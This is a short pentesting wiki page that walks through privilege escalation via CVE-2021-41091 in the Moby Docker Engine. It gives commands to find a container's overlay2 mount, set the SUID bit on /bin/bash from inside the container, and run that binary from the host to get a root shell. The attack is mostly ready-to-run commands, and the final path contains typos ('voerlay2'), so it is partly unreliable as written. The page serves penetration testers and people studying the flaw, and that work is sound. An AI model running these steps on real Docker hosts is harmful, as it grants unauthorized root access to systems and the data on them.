Moby Docker Engine Privilege Escalation

Directory Traversal & Arbitrary Command Execution (CVE-2021-41091 )

1. Find Docker Container Directory

First off, find the directory which the docker container mounted

findmnt

# Results e.g.
/var/lib/docker/overlay2/abcdef...xyz/merged

Assume the directory above found, we can investigate in the directory.

ls -la /var/lib/docker/overlay2/abcdef...xyz/merged/

2. Prepare SUID Binary in Container

If we can be root in the docker container, set uid arbitrary binary as below. Please note that we need to do that in the container, not the real host.

chmod u+s /bin/bash

3. Execute the SUID Binary in Real Host

Back to the real host machine again, execute the binary which we set uid to privilege escalation.

/var/lib/docker/voerlay2/abdef...xyz/merged/bin/bash -p

We should get a root shell.

PreviousDocker Registry Pentesting NextKubernetes Pentesting

Last updated 1 month ago

hashtagDirectory Traversal & Arbitrary Command Execution (CVE-2021-41091arrow-up-right )

hashtag1. Find Docker Container Directory

hashtag2. Prepare SUID Binary in Container

hashtag3. Execute the SUID Binary in Real Host

Directory Traversal & Arbitrary Command Execution (CVE-2021-41091 )

1. Find Docker Container Directory

2. Prepare SUID Binary in Container

3. Execute the SUID Binary in Real Host